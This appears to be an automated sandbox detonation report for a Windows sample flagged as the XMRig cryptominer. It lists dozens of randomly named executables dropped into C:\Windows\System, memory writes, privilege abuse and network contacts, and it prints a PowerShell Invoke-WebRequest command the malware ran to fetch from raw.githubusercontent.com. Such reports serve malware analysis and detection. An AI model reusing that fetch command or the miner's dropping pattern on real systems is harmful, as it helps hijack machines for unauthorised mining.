C:\Windows\System\FGsNYvM.exe

C:\Windows\System\dKftexC.exe

C:\Windows\System\dKftexC.exe

C:\Windows\System\fRjHYKB.exe

C:\Windows\System\fRjHYKB.exe

C:\Windows\System\buqKTjq.exe

C:\Windows\System\buqKTjq.exe

C:\Windows\System\bmazuur.exe

C:\Windows\System\bmazuur.exe

C:\Windows\System\CbzQkdq.exe

C:\Windows\System\CbzQkdq.exe

C:\Windows\System\DqYutHn.exe

C:\Windows\System\DqYutHn.exe

C:\Windows\System\EvatWEz.exe

C:\Windows\System\EvatWEz.exe

C:\Windows\System\kyukYsf.exe

C:\Windows\System\kyukYsf.exe

C:\Windows\System\fFRvjLI.exe

C:\Windows\System\fFRvjLI.exe

C:\Windows\System\AqHLxCa.exe

C:\Windows\System\AqHLxCa.exe

C:\Windows\System\XrIizKx.exe

C:\Windows\System\XrIizKx.exe

C:\Windows\System\aRslSsG.exe

C:\Windows\System\aRslSsG.exe

C:\Windows\System\AITLpyM.exe

C:\Windows\System\AITLpyM.exe

C:\Windows\System\fHvFfhs.exe

C:\Windows\System\fHvFfhs.exe

C:\Windows\System\OoQmCEU.exe

C:\Windows\System\OoQmCEU.exe

C:\Windows\System\RecAjDs.exe

C:\Windows\System\RecAjDs.exe

C:\Windows\System\nPzoSRF.exe

C:\Windows\System\nPzoSRF.exe

C:\Windows\System\xiBlhFj.exe

C:\Windows\System\xiBlhFj.exe

C:\Windows\System\WEFGKad.exe

C:\Windows\System\WEFGKad.exe

C:\Windows\System\HanGwNK.exe

C:\Windows\System\HanGwNK.exe

C:\Windows\System\RWDyekv.exe

C:\Windows\System\RWDyekv.exe

C:\Windows\System\kMidiSq.exe

C:\Windows\System\kMidiSq.exe

C:\Windows\System\dgduOkM.exe

C:\Windows\System\dgduOkM.exe

C:\Windows\System\xXqPGSH.exe

C:\Windows\System\xXqPGSH.exe

C:\Windows\System\FypEQYf.exe

C:\Windows\System\FypEQYf.exe

C:\Windows\System\BMEqVdi.exe

C:\Windows\System\BMEqVdi.exe

C:\Windows\System\hRNKLKG.exe

C:\Windows\System\hRNKLKG.exe

C:\Windows\System\LhJsGwQ.exe

C:\Windows\System\LhJsGwQ.exe

C:\Windows\System\TVvdIpi.exe

C:\Windows\System\TVvdIpi.exe

C:\Windows\System\CYeQWJj.exe

C:\Windows\System\CYeQWJj.exe

C:\Windows\System\zhIFdGc.exe

C:\Windows\System\zhIFdGc.exe

C:\Windows\System\dEUvMdr.exe

C:\Windows\System\dEUvMdr.exe

C:\Windows\System\PrtqZAe.exe

C:\Windows\System\PrtqZAe.exe

C:\Windows\System\kzZgVoz.exe

C:\Windows\System\kzZgVoz.exe

C:\Windows\System\giJAZxz.exe

C:\Windows\System\giJAZxz.exe

C:\Windows\System\ZuJKOFh.exe

C:\Windows\System\ZuJKOFh.exe

C:\Windows\System\BQskWqZ.exe

C:\Windows\System\BQskWqZ.exe

C:\Windows\System\vnvpGzm.exe

C:\Windows\System\vnvpGzm.exe

C:\Windows\System\bphghvq.exe

C:\Windows\System\bphghvq.exe

C:\Windows\System\ykktNTo.exe

C:\Windows\System\ykktNTo.exe

C:\Windows\System\JyhzwDW.exe

C:\Windows\System\JyhzwDW.exe

C:\Windows\System\dTTdvlY.exe

C:\Windows\System\dTTdvlY.exe

C:\Windows\System\kgTEwVK.exe

C:\Windows\System\kgTEwVK.exe

C:\Windows\System\sKTJZoc.exe

C:\Windows\System\sKTJZoc.exe

C:\Windows\System\nAviKFX.exe

C:\Windows\System\nAviKFX.exe

C:\Windows\System\BPhnqYy.exe

C:\Windows\System\BPhnqYy.exe

C:\Windows\System\ymocWtS.exe

C:\Windows\System\ymocWtS.exe

C:\Windows\System\NNCIDFL.exe

C:\Windows\System\NNCIDFL.exe

C:\Windows\System\OKFTnXA.exe

C:\Windows\System\OKFTnXA.exe

C:\Windows\System\twkvWzZ.exe

C:\Windows\System\twkvWzZ.exe

C:\Windows\System\OvcwEki.exe

C:\Windows\System\OvcwEki.exe

C:\Windows\System\SbqdTJN.exe

C:\Windows\System\SbqdTJN.exe

C:\Windows\System\cMFMgac.exe

C:\Windows\System\cMFMgac.exe

C:\Windows\System\ncwlwUk.exe

C:\Windows\System\ncwlwUk.exe

C:\Windows\System\AVBLemX.exe

C:\Windows\System\AVBLemX.exe

C:\Windows\System\jvdssrZ.exe

C:\Windows\System\jvdssrZ.exe

C:\Windows\System\HTOYvXc.exe

C:\Windows\System\HTOYvXc.exe

C:\Windows\System\gWEJCZL.exe

C:\Windows\System\gWEJCZL.exe

C:\Windows\System\VuiJfmJ.exe

C:\Windows\System\VuiJfmJ.exe

C:\Windows\System\vevhwhl.exe

C:\Windows\System\vevhwhl.exe

C:\Windows\System\nuOhwAQ.exe

C:\Windows\System\nuOhwAQ.exe

C:\Windows\System\gswFmng.exe

C:\Windows\System\gswFmng.exe

C:\Windows\System\iVVCGin.exe

C:\Windows\System\iVVCGin.exe

C:\Windows\System\AfLIsvG.exe

C:\Windows\System\AfLIsvG.exe

C:\Windows\System\lgiGyfx.exe

C:\Windows\System\lgiGyfx.exe

C:\Windows\System\sOOcjPq.exe

C:\Windows\System\sOOcjPq.exe

C:\Windows\System\JqNLdPp.exe

C:\Windows\System\JqNLdPp.exe

C:\Windows\System\taQNKBe.exe

C:\Windows\System\taQNKBe.exe

C:\Windows\System\SqLgpNy.exe

C:\Windows\System\SqLgpNy.exe

C:\Windows\System\TFmnXMf.exe

C:\Windows\System\TFmnXMf.exe

C:\Windows\System\uqXuKmq.exe

C:\Windows\System\uqXuKmq.exe

C:\Windows\System\lRbwnOu.exe

C:\Windows\System\lRbwnOu.exe

C:\Windows\System\mfxlONO.exe

C:\Windows\System\mfxlONO.exe

C:\Windows\System\GCEzTeM.exe

C:\Windows\System\GCEzTeM.exe

C:\Windows\System\wSMoNjM.exe

C:\Windows\System\wSMoNjM.exe

C:\Windows\System\uvKBikx.exe

C:\Windows\System\uvKBikx.exe

C:\Windows\System\awUAIYj.exe

C:\Windows\System\awUAIYj.exe

C:\Windows\System\cHwkYLr.exe

C:\Windows\System\cHwkYLr.exe

C:\Windows\System\JJRCcoa.exe

C:\Windows\System\JJRCcoa.exe

C:\Windows\System\OiZufmO.exe

C:\Windows\System\OiZufmO.exe

C:\Windows\System\uAdfsXp.exe

C:\Windows\System\uAdfsXp.exe

C:\Windows\System\xYwumEq.exe

C:\Windows\System\xYwumEq.exe

C:\Windows\System\GyeIAhZ.exe

C:\Windows\System\GyeIAhZ.exe

C:\Windows\System\hbVzSYx.exe

C:\Windows\System\hbVzSYx.exe

C:\Windows\System\AgUwmwn.exe

C:\Windows\System\AgUwmwn.exe

C:\Windows\System\JFdnrMb.exe

C:\Windows\System\JFdnrMb.exe

C:\Windows\System\rsxEATB.exe

C:\Windows\System\rsxEATB.exe

C:\Windows\System\vhQxAux.exe

C:\Windows\System\vhQxAux.exe

C:\Windows\System\CFfXBQq.exe

C:\Windows\System\CFfXBQq.exe

C:\Windows\System\IDqvukc.exe

C:\Windows\System\IDqvukc.exe

C:\Windows\System\tnEuGCr.exe

C:\Windows\System\tnEuGCr.exe

C:\Windows\System\qOnfGwK.exe

C:\Windows\System\qOnfGwK.exe

C:\Windows\System\ynAzWBl.exe

C:\Windows\System\ynAzWBl.exe

C:\Windows\System\JuSwHxD.exe

C:\Windows\System\JuSwHxD.exe

C:\Windows\System\WYBmORa.exe

C:\Windows\System\WYBmORa.exe

C:\Windows\System\hSApJqH.exe

C:\Windows\System\hSApJqH.exe

C:\Windows\System\jZQKeye.exe

C:\Windows\System\jZQKeye.exe

C:\Windows\System\eAykfXz.exe

C:\Windows\System\eAykfXz.exe

C:\Windows\System\MYiRdUy.exe

C:\Windows\System\MYiRdUy.exe

C:\Windows\System\pYhoJzo.exe

C:\Windows\System\pYhoJzo.exe

C:\Windows\System\vkQnYoP.exe

C:\Windows\System\vkQnYoP.exe

C:\Windows\System\HjlotJA.exe

C:\Windows\System\HjlotJA.exe

C:\Windows\System\bYHRbWj.exe

C:\Windows\System\bYHRbWj.exe

C:\Windows\System\qRUacsw.exe

C:\Windows\System\qRUacsw.exe


Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp

Files


Analysis: behavioral2

Detonation Overview

Submitted

2024-05-25 16:08

Reported

2024-05-25 16:10

Platform

win10v2004-20240426-en

Max time kernel

91s

Max time network

95s

Command Line

"C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4624 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\ysbayia.exe
PID 4624 wrote to memory of 4948 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\erUvdcv.exe
PID 4624 wrote to memory of 4948 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\erUvdcv.exe
PID 4624 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\ZYuODNQ.exe
PID 4624 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\ZYuODNQ.exe
PID 4624 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\rxzjnAz.exe
PID 4624 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\rxzjnAz.exe
PID 4624 wrote to memory of 4788 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\EKpULeb.exe
PID 4624 wrote to memory of 4788 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\EKpULeb.exe
PID 4624 wrote to memory of 1104 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\qkgmUNv.exe
PID 4624 wrote to memory of 1104 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\qkgmUNv.exe
PID 4624 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\xSqnjAu.exe
PID 4624 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\xSqnjAu.exe
PID 4624 wrote to memory of 436 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\HaskdEV.exe
PID 4624 wrote to memory of 436 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\HaskdEV.exe
PID 4624 wrote to memory of 1352 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\YYlJRxL.exe
PID 4624 wrote to memory of 1352 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\YYlJRxL.exe
PID 4624 wrote to memory of 3988 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\fJXdyIQ.exe
PID 4624 wrote to memory of 3988 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\fJXdyIQ.exe
PID 4624 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\VKoHOcE.exe
PID 4624 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\VKoHOcE.exe
PID 4624 wrote to memory of 4272 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\nKLdfOV.exe
PID 4624 wrote to memory of 4272 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\nKLdfOV.exe
PID 4624 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\KLUwUZh.exe
PID 4624 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\KLUwUZh.exe
PID 4624 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\owIqajs.exe
PID 4624 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\owIqajs.exe
PID 4624 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\KeZkeEJ.exe
PID 4624 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\KeZkeEJ.exe
PID 4624 wrote to memory of 4088 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\uTuUecx.exe
PID 4624 wrote to memory of 4088 N/A C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe C:\Windows\System\uTuUecx.exe

Processes

C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\7283d55cf2c83e95324ff585e4cba837_JaffaCakes118.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "


C:\Windows\System\dcpvDVU.exe

C:\Windows\System\NuJVbUL.exe

C:\Windows\System\NuJVbUL.exe

C:\Windows\System\TSutRhc.exe

C:\Windows\System\TSutRhc.exe

C:\Windows\System\zHcvriX.exe

C:\Windows\System\zHcvriX.exe

C:\Windows\System\OjyBrik.exe

C:\Windows\System\OjyBrik.exe

C:\Windows\System\tVVzMcS.exe

C:\Windows\System\tVVzMcS.exe

C:\Windows\System\cNzIRdi.exe

C:\Windows\System\cNzIRdi.exe

C:\Windows\System\PltJHUs.exe

C:\Windows\System\PltJHUs.exe

C:\Windows\System\DsKcjnc.exe

C:\Windows\System\DsKcjnc.exe

C:\Windows\System\ORumAFD.exe

C:\Windows\System\ORumAFD.exe

C:\Windows\System\taIokaD.exe

C:\Windows\System\taIokaD.exe

C:\Windows\System\llXbFLb.exe

C:\Windows\System\llXbFLb.exe

C:\Windows\System\JQAGGTJ.exe

C:\Windows\System\JQAGGTJ.exe

C:\Windows\System\Pszjmdo.exe

C:\Windows\System\Pszjmdo.exe

C:\Windows\System\DrjsYyg.exe

C:\Windows\System\DrjsYyg.exe

C:\Windows\System\vvoSMtX.exe

C:\Windows\System\vvoSMtX.exe

C:\Windows\System\MDjgqPq.exe

C:\Windows\System\MDjgqPq.exe

C:\Windows\System\kedJeYN.exe

C:\Windows\System\kedJeYN.exe

C:\Windows\System\UZkXyUK.exe

C:\Windows\System\UZkXyUK.exe

C:\Windows\System\oOmQyXI.exe

C:\Windows\System\oOmQyXI.exe

C:\Windows\System\juUhXuI.exe

C:\Windows\System\juUhXuI.exe

C:\Windows\System\GfsLKvO.exe

C:\Windows\System\GfsLKvO.exe

C:\Windows\System\RpWDcSd.exe

C:\Windows\System\RpWDcSd.exe

C:\Windows\System\imrOYGG.exe

C:\Windows\System\imrOYGG.exe

C:\Windows\System\AJLetBq.exe

C:\Windows\System\AJLetBq.exe

C:\Windows\System\CHszyOy.exe

C:\Windows\System\CHszyOy.exe

C:\Windows\System\fZVeUzb.exe

C:\Windows\System\fZVeUzb.exe

C:\Windows\System\ZPIpfmu.exe

C:\Windows\System\ZPIpfmu.exe

C:\Windows\System\pODSlLm.exe

C:\Windows\System\pODSlLm.exe

C:\Windows\System\NgpmUho.exe

C:\Windows\System\NgpmUho.exe

C:\Windows\System\PbeiIcb.exe

C:\Windows\System\PbeiIcb.exe

C:\Windows\System\ljyGGLI.exe

C:\Windows\System\ljyGGLI.exe

C:\Windows\System\vtTlEjO.exe

C:\Windows\System\vtTlEjO.exe

C:\Windows\System\TdTskqS.exe

C:\Windows\System\TdTskqS.exe

C:\Windows\System\KttVVDG.exe

C:\Windows\System\KttVVDG.exe

C:\Windows\System\FHbUebd.exe

C:\Windows\System\FHbUebd.exe

C:\Windows\System\abedvra.exe

C:\Windows\System\abedvra.exe

C:\Windows\System\KtyNjRo.exe

C:\Windows\System\KtyNjRo.exe

C:\Windows\System\MIxyIjx.exe

C:\Windows\System\MIxyIjx.exe

C:\Windows\System\OBhuASo.exe

C:\Windows\System\OBhuASo.exe

C:\Windows\System\kqbxaFJ.exe

C:\Windows\System\kqbxaFJ.exe

C:\Windows\System\ZXGbgkn.exe

C:\Windows\System\ZXGbgkn.exe

C:\Windows\System\QVwZkvU.exe

C:\Windows\System\QVwZkvU.exe

C:\Windows\System\scaNLsY.exe

C:\Windows\System\scaNLsY.exe

C:\Windows\System\kYRJNXx.exe

C:\Windows\System\kYRJNXx.exe

C:\Windows\System\gzHjOQW.exe

C:\Windows\System\gzHjOQW.exe

C:\Windows\System\mXxCJkU.exe

C:\Windows\System\mXxCJkU.exe

C:\Windows\System\aherJtN.exe

C:\Windows\System\aherJtN.exe

C:\Windows\System\GerdfoE.exe

C:\Windows\System\GerdfoE.exe

C:\Windows\System\qjESXsz.exe

C:\Windows\System\qjESXsz.exe

C:\Windows\System\eXmzUxS.exe

C:\Windows\System\eXmzUxS.exe

C:\Windows\System\rVxvHCE.exe

C:\Windows\System\rVxvHCE.exe

C:\Windows\System\sjjSsXv.exe

C:\Windows\System\sjjSsXv.exe

C:\Windows\System\cyBNdOH.exe

C:\Windows\System\cyBNdOH.exe

C:\Windows\System\UoXpupD.exe

C:\Windows\System\UoXpupD.exe

C:\Windows\System\BRXoZew.exe

C:\Windows\System\BRXoZew.exe

C:\Windows\System\aJekBUH.exe

C:\Windows\System\aJekBUH.exe

C:\Windows\System\XdkLJoE.exe

C:\Windows\System\XdkLJoE.exe

C:\Windows\System\IJnhyRT.exe

C:\Windows\System\IJnhyRT.exe

C:\Windows\System\NKMhySD.exe

C:\Windows\System\NKMhySD.exe

C:\Windows\System\jDGHfvz.exe

C:\Windows\System\jDGHfvz.exe

C:\Windows\System\UVLBqiK.exe

C:\Windows\System\UVLBqiK.exe

C:\Windows\System\mpaIdJv.exe

C:\Windows\System\mpaIdJv.exe

C:\Windows\System\xKxGcEa.exe

C:\Windows\System\xKxGcEa.exe

C:\Windows\System\eZtCKQy.exe

C:\Windows\System\eZtCKQy.exe

C:\Windows\System\XXdaora.exe

C:\Windows\System\XXdaora.exe

C:\Windows\System\ReMMtZB.exe

C:\Windows\System\ReMMtZB.exe

C:\Windows\System\riFqZMb.exe

C:\Windows\System\riFqZMb.exe

C:\Windows\System\Hmatlpk.exe

C:\Windows\System\Hmatlpk.exe

C:\Windows\System\juyxTdW.exe

C:\Windows\System\juyxTdW.exe

C:\Windows\System\MohzoVE.exe

C:\Windows\System\MohzoVE.exe

C:\Windows\System\WDPknNW.exe

C:\Windows\System\WDPknNW.exe

C:\Windows\System\wUCFnac.exe

C:\Windows\System\wUCFnac.exe

C:\Windows\System\YwJyhlP.exe

C:\Windows\System\YwJyhlP.exe

C:\Windows\System\HcLpPXc.exe

C:\Windows\System\HcLpPXc.exe

C:\Windows\System\QbRdcvp.exe

C:\Windows\System\QbRdcvp.exe

C:\Windows\System\FLMlCFL.exe

C:\Windows\System\FLMlCFL.exe

C:\Windows\System\wmpRFNj.exe

C:\Windows\System\wmpRFNj.exe

C:\Windows\System\pdmfYBX.exe

C:\Windows\System\pdmfYBX.exe

C:\Windows\System\ESeCurL.exe

C:\Windows\System\ESeCurL.exe

C:\Windows\System\oAFPQqe.exe

C:\Windows\System\oAFPQqe.exe

C:\Windows\System\XtVHgQA.exe

C:\Windows\System\XtVHgQA.exe

C:\Windows\System\etWBKrb.exe

C:\Windows\System\etWBKrb.exe

C:\Windows\System\IltZqMC.exe

C:\Windows\System\IltZqMC.exe

C:\Windows\System\DnZJXGy.exe

C:\Windows\System\DnZJXGy.exe

C:\Windows\System\HrDucWZ.exe

C:\Windows\System\HrDucWZ.exe

C:\Windows\System\YktJutO.exe

C:\Windows\System\YktJutO.exe

C:\Windows\System\ATvwLNH.exe

C:\Windows\System\ATvwLNH.exe

C:\Windows\System\YYhjNkt.exe

C:\Windows\System\YYhjNkt.exe

C:\Windows\System\XHRKiSZ.exe

C:\Windows\System\XHRKiSZ.exe

C:\Windows\System\IzLYmvW.exe

C:\Windows\System\IzLYmvW.exe

C:\Windows\System\jyEKRNn.exe

C:\Windows\System\jyEKRNn.exe

C:\Windows\System\YRxXRjv.exe

C:\Windows\System\YRxXRjv.exe

C:\Windows\System\sXtAZrx.exe

C:\Windows\System\sXtAZrx.exe

C:\Windows\System\yVJLHgH.exe

C:\Windows\System\yVJLHgH.exe

C:\Windows\System\nuvJgYI.exe

C:\Windows\System\nuvJgYI.exe

C:\Windows\System\vxkwPMj.exe

C:\Windows\System\vxkwPMj.exe

C:\Windows\System\VFkNxCv.exe

C:\Windows\System\VFkNxCv.exe

C:\Windows\System\ekkDrnd.exe

C:\Windows\System\ekkDrnd.exe

C:\Windows\System\ZIEparJ.exe

C:\Windows\System\ZIEparJ.exe

C:\Windows\System\SBOgMij.exe

C:\Windows\System\SBOgMij.exe

C:\Windows\System\TSVbvvr.exe

C:\Windows\System\TSVbvvr.exe

C:\Windows\System\rKkgnTi.exe

C:\Windows\System\rKkgnTi.exe

C:\Windows\System\JjlnkNh.exe

C:\Windows\System\JjlnkNh.exe

C:\Windows\System\eAqbwnt.exe

C:\Windows\System\eAqbwnt.exe

C:\Windows\System\wjsReWf.exe

C:\Windows\System\wjsReWf.exe

C:\Windows\System\BgWDMWU.exe

C:\Windows\System\BgWDMWU.exe

C:\Windows\System\mlVnukE.exe

C:\Windows\System\mlVnukE.exe

C:\Windows\System\UQXaebz.exe

C:\Windows\System\UQXaebz.exe

C:\Windows\System\jLWoLBj.exe

C:\Windows\System\jLWoLBj.exe

C:\Windows\System\djcTzJv.exe

C:\Windows\System\djcTzJv.exe

C:\Windows\System\GDASGPX.exe

C:\Windows\System\GDASGPX.exe

C:\Windows\System\tDGsCIP.exe

C:\Windows\System\tDGsCIP.exe

C:\Windows\System\ASZcwgg.exe

C:\Windows\System\ASZcwgg.exe

C:\Windows\System\GmsYfXI.exe

C:\Windows\System\GmsYfXI.exe

C:\Windows\System\oFfygZd.exe

C:\Windows\System\oFfygZd.exe

C:\Windows\System\tHZquPS.exe

C:\Windows\System\tHZquPS.exe

C:\Windows\System\AerwMmZ.exe

C:\Windows\System\AerwMmZ.exe

C:\Windows\System\tbMevwm.exe

C:\Windows\System\tbMevwm.exe

C:\Windows\System\retaZrg.exe

C:\Windows\System\retaZrg.exe

C:\Windows\System\LdIvuSb.exe

C:\Windows\System\LdIvuSb.exe

C:\Windows\System\xjhJrOM.exe

C:\Windows\System\xjhJrOM.exe

C:\Windows\System\FbPYhaW.exe

C:\Windows\System\FbPYhaW.exe

C:\Windows\System\hMBnwFm.exe

C:\Windows\System\hMBnwFm.exe

C:\Windows\System\CiDFjhj.exe

C:\Windows\System\CiDFjhj.exe

C:\Windows\System\FLLWmcx.exe

C:\Windows\System\FLLWmcx.exe

C:\Windows\System\mIgDBxL.exe

C:\Windows\System\mIgDBxL.exe

C:\Windows\System\VwarecX.exe

C:\Windows\System\VwarecX.exe

C:\Windows\System\tcAZexR.exe

C:\Windows\System\tcAZexR.exe

C:\Windows\System\jbUSQDF.exe

C:\Windows\System\jbUSQDF.exe

C:\Windows\System\gyoSbAS.exe

C:\Windows\System\gyoSbAS.exe

C:\Windows\System\gYmFvsH.exe

C:\Windows\System\gYmFvsH.exe

C:\Windows\System\VOeTgzb.exe

C:\Windows\System\VOeTgzb.exe

C:\Windows\System\YrMEjBY.exe

C:\Windows\System\YrMEjBY.exe

C:\Windows\System\GGBRCyw.exe

C:\Windows\System\GGBRCyw.exe

C:\Windows\System\etJyMKy.exe

C:\Windows\System\etJyMKy.exe

C:\Windows\System\aYQhDys.exe

C:\Windows\System\aYQhDys.exe

C:\Windows\System\Qxzdpxo.exe

C:\Windows\System\Qxzdpxo.exe

C:\Windows\System\EbYQwwz.exe

C:\Windows\System\EbYQwwz.exe

C:\Windows\System\GvOEuUc.exe

C:\Windows\System\GvOEuUc.exe

C:\Windows\System\xrwicGl.exe

C:\Windows\System\xrwicGl.exe

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp

Files
